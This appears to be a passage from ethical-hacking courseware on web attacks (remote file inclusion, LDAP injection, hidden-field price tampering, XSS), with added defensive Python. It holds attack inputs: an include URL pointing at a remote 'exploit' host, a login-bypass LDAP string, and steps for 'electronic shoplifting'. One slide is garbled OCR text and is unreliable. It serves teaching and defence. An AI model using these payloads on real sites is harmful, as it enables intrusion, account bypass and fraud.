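The defect in the PHP above is that the DRINK value is used as a file name rather than as a key into a set of files the application knows about. The following is an added example for this page, not code from the courseware: it models the include decision in Python, first reproducing what $drink . '.php' evaluates to for a given request (nothing is actually loaded), then mapping the parameter through a fixed allowlist. The module paths in the allowlist are assumptions.

```python
# Added example (not from the courseware): the DRINK include from the PHP
# code above, modelled in Python. include_target_vulnerable() reproduces what
# $drink . '.php' evaluates to for a given query string (nothing is loaded);
# include_target_safe() maps the parameter through a fixed allowlist, so a
# remote URL or a path can never become the include target. Module paths are
# assumptions.
from urllib.parse import parse_qs, urlsplit

DEFAULT_DRINK = "coke"
# Allowlist: the only include targets the application is prepared to load.
DRINK_INCLUDES = {"pepsi": "drinks/pepsi.php", "coke": "drinks/coke.php"}


def _drink_param(url):
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return q["DRINK"][0] if "DRINK" in q else None


def include_target_vulnerable(url):
    """What require() would be asked to load for this request."""
    drink = _drink_param(url)
    if drink is None:
        drink = DEFAULT_DRINK
    return drink + ".php"


def include_target_safe(url):
    """Only a known key selects a file; anything else is refused outright."""
    drink = _drink_param(url)
    if drink is None:
        drink = DEFAULT_DRINK
    if drink not in DRINK_INCLUDES:
        raise ValueError(f"unknown DRINK value {drink!r}")
    return DRINK_INCLUDES[drink]


def is_remote(target):
    """True when a computed include target names a URL rather than a file."""
    return "://" in target


def is_refused(url):
    try:
        include_target_safe(url)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    exploit = "http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?"
    print(include_target_vulnerable(exploit), is_remote(include_target_vulnerable(exploit)))
    print(is_refused(exploit), include_target_safe("http://www.juggyboy.com/orders.php?DRINK=pepsi"))
```

Running the exploit URL through include_target_vulnerable() shows why the attacker's URL ends in "?": the appended ".php" lands after it and becomes part of the remote query string, so the remote host still serves the exploit. With the allowlist, the request is refused before any file name is formed; disabling remote includes in the PHP configuration is a second, independent control.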
What Is LDAP Injection?

An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services to obtain direct access to databases behind an LDAP tree.

Filter syntax: (attributeName operator value)

    Operator    Example
    =           (objectclass=user)
    >=          (mdbStorageQuota>=100000)
    <=          (mdbStorageQuota<=100000)
    ~=          (displayName~=Foeckeler)
    *           (displayName=*John*)
    AND (&)     (&(objectclass=user)(displayName=John))
    OR (|)      (|(objectclass=user)(displayName=John))
    NOT (!)     (!objectClass=group)

LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. LDAP is based on the client-server model and clients can search the directory entries using filters.

An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All the inputs to the LDAP must be properly filtered, otherwise vulnerabilities in LDAP allow executing unauthorized queries or modification of the contents. LDAP attacks exploit web-based applications constructed based on LDAP statements by using a local proxy. LDAP statements are modified when certain applications fail. These services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. It is based on the client-server model and clients can search the directory entries using filters.

[Figure 13.10: LDAP Injection (the filter syntax table above).]
How LDAP Injection Works

LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate the LDAP query. LDAP injection attacks are commonly used on web applications. LDAP injection applies to any application that has some kind of user input used to generate LDAP queries. To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques. Depending upon the implementation of the target, one can try to achieve:

- Login bypass
- Information disclosure
- Privilege escalation
- Information alteration

[Figure 13.11: Normal operation. The client sends a normal query to the LDAP server and receives a normal result.]

[Figure 13.12: Operation with code injection. The client sends a normal query plus injected code to the LDAP server and receives the normal result and/or additional information.]

Attack

If an attacker enters a valid user name of "juggyboy" and injects juggyboy)(&)), then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server; only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password.

[Figure 13.13: Attack. An Account Login form with Username juggyboy)(&)) and Password blah is submitted; the LDAP server processes only the first filter and returns a successful login.]
  • 57. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications H i d d e n F i e l d M a n i p u l a t i o n A t t a c k I C E H A ttack Request h t t p : / /w w w . ju g g y b o y . c o m /p a g e . a s p x ? p r o d u o t= J u g g y b o y % 2 0 S h i r t & p r i c e = 2 . 00 N orm al Request h t t p : / / w w w . ju g g y b o y . c o m /p a g e . a s p x ? p r o d u c t= J u g g y b o y % 2 O S h i r t & p r ic e = 2 0 0 .0 0 HTML Code < fo m method="post" action^ " page.asp x" > <in p u t type="hidden" name= "PRICE" val ue200 . 0 0 " ‫־‬ "> Product name: < inp u t type= " te x t‫״‬ name="product" v a lu e="Juggyboy S h ir t "X br> Product p r ic e : 2 0 0 .00" X b r> < inp u t type=" submit" valu e= "submit" > </form > $ When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST) 0 HTML can also store field values as hidden fields, which are not rendered to the screen by th e browser, but are collected and subm itted as parameters during form submissions 6 Attackers can examine th e HTML code o f the page and change the hidden field values in order to change post requests to server C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . Product Name Jugg yboy S h irt ^ [ 200 )Product Price Submit H i d d e n F i e l d M a n i p u l a t i o n A t t a c k Hidden m anipulation attacks are m ostly used against e‫־‬com m erce websites today. M any online stores face these problem s. In every client session, developers use hidden fields to store client inform ation, including price o f the product (Including discount rates). 
At the time of development of such programs, developers feel that all the applications they develop are safe, but a hacker can manipulate the price of the product and complete a transaction with a price that he or she has altered, rather than the actual price of the product. For example: on eBay, a particular mobile phone is for sale for $1000 and the hacker, by altering the price, gets it for only $10. This is a huge loss for website owners. To protect their networks from attacks, website owners use the latest antivirus software, firewalls, intrusion detection systems, etc. If their website is attacked, it often also loses its credibility in the market.
When any target requests web services and makes choices on the HTML page, the choices are saved as form field values and delivered to the requested application as an HTTP request (GET or POST). HTML pages generally save field values as hidden fields; these are not displayed on the monitor of the target but are saved and placed as strings or parameters at the time of form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change POST requests to the server.
  • 58.
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
1. Open the HTML page within an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>").
3. Modify its content to a different value (e.g., "<type=hidden name=price value=2.00>").
4. Save the HTML file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden manipulation.
FIGURE 13.14: Hidden Field Manipulation Attack (Normal Request http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00 with the HTML code above and hidden field Price = 200.00; Attack Request http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00).
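The server-side counterpart to the attack above, added here as a Python example that is not part of the CEH module: a checkout that trusts the PRICE hidden field accepts the altered 2.00, while one that re-reads the price from a catalogue (constructed here) ignores the client value entirely, and a third variant accepts a client-carried price only when an HMAC binding it to the product verifies (key and catalogue are placeholders).

```python
"""Added example (not from the CEH module): three ways a checkout handler can
treat the PRICE hidden field from the slide's form."""
import hashlib
import hmac
from typing import Optional

# Constructed catalogue standing in for the shop's database.
CATALOG = {"Juggyboy Shirt": "200.00"}
# Placeholder key; a real deployment loads this from server-side configuration.
SECRET = b"placeholder-server-secret"


def checkout_vulnerable(form: dict) -> str:
    """Charges whatever the hidden PRICE field says, so price=2.00 goes through."""
    return form["PRICE"]


def checkout_safe(form: dict) -> Optional[str]:
    """Ignores the client-supplied price and re-reads it from the catalogue.
    Returns None for an unknown product instead of trusting the form."""
    return CATALOG.get(form["product"])


def sign_price(product: str, price: str) -> str:
    """If a price must travel in the form, bind it to the product with an HMAC
    computed server-side when the page is rendered."""
    msg = f"{product}|{price}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def checkout_signed(form: dict) -> Optional[str]:
    """Accepts the hidden price only if its signature still matches; editing
    PRICE in the saved HTML invalidates the signature, so None is returned."""
    expected = sign_price(form["product"], form["PRICE"])
    if not hmac.compare_digest(expected, form.get("sig", "")):
        return None
    return form["PRICE"]


if __name__ == "__main__":
    tampered = {"product": "Juggyboy Shirt", "PRICE": "2.00"}  # the attack request
    print(checkout_vulnerable(tampered))  # 2.00  (electronic shoplifting succeeds)
    print(checkout_safe(tampered))        # 200.00 (catalogue price wins)
```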
  • 59. Cross-Site Scripting (XSS) Attacks
- Cross-site scripting ('XSS' or 'CSS') attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users
- It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering
- Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests
Possible consequences: session hijacking, brute force password cracking, data theft, intranet probing, keylogging and remote monitoring, malicious script execution, redirecting to a malicious server, exploiting user privileges, ads in hidden IFRAMEs and pop-ups, data manipulation.
Cross-Site Scripting (XSS) Attacks
Cross-site scripting is also called XSS. Vulnerabilities occur when an attacker uses web applications and sends malicious code in JavaScript to different end users. It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. When a web application uses input from a user, an attacker can commence an attack using that input, which can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user may trust the web application, and the attacker can exploit that trust in order to do things that would not be allowed under normal conditions.
An attacker often uses different methods to encode the malicious portion (Unicode) of the tag, so that a request seems genuine to the user. Some of the possible consequences are:
- Malicious script execution
- Session hijacking
- Brute force password cracking
- Redirecting to a malicious server
- Exploiting user privileges
- Data theft
- Intranet probing
- Ads in hidden IFRAMEs and pop-ups
- Data manipulation
- Keylogging and remote monitoring
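The mechanism described above, as an added Python example that is not part of the CEH module: the same page fragment is built once with the raw request parameter and once with HTML entity encoding applied for both the text and the quoted-attribute context the value lands in, plus a check a test suite can use to confirm the raw markup never reaches the browser.

```python
"""Added example (not from the CEH module): reflecting a request parameter into
dynamic content with and without output encoding."""
import html

# Constructed request parameter containing markup, standing in for user input.
SAMPLE_INPUT = "<script>alert(1)</script>"


def greet_vulnerable(name: str) -> str:
    """Dynamic content built from unvalidated input: any markup in `name` is
    parsed by the browser as part of the page, in both contexts."""
    return f'<p>Hello {name}</p><input name="q" value="{name}">'


def greet_safe(name: str) -> str:
    """Same fragment; the value is entity-encoded (quote=True also encodes
    " and '), so it is safe in text and in a quoted attribute."""
    safe = html.escape(name, quote=True)
    return f'<p>Hello {safe}</p><input name="q" value="{safe}">'


def reflects_raw_markup(rendered: str, user_input: str) -> bool:
    """True when the user's input survives into the page unencoded; a useful
    assertion in a regression test for a reflected-XSS fix."""
    return user_input in rendered


if __name__ == "__main__":
    print(greet_vulnerable(SAMPLE_INPUT))  # script tag reaches the browser
    print(greet_safe(SAMPLE_INPUT))        # &lt;script&gt;... shown as text
```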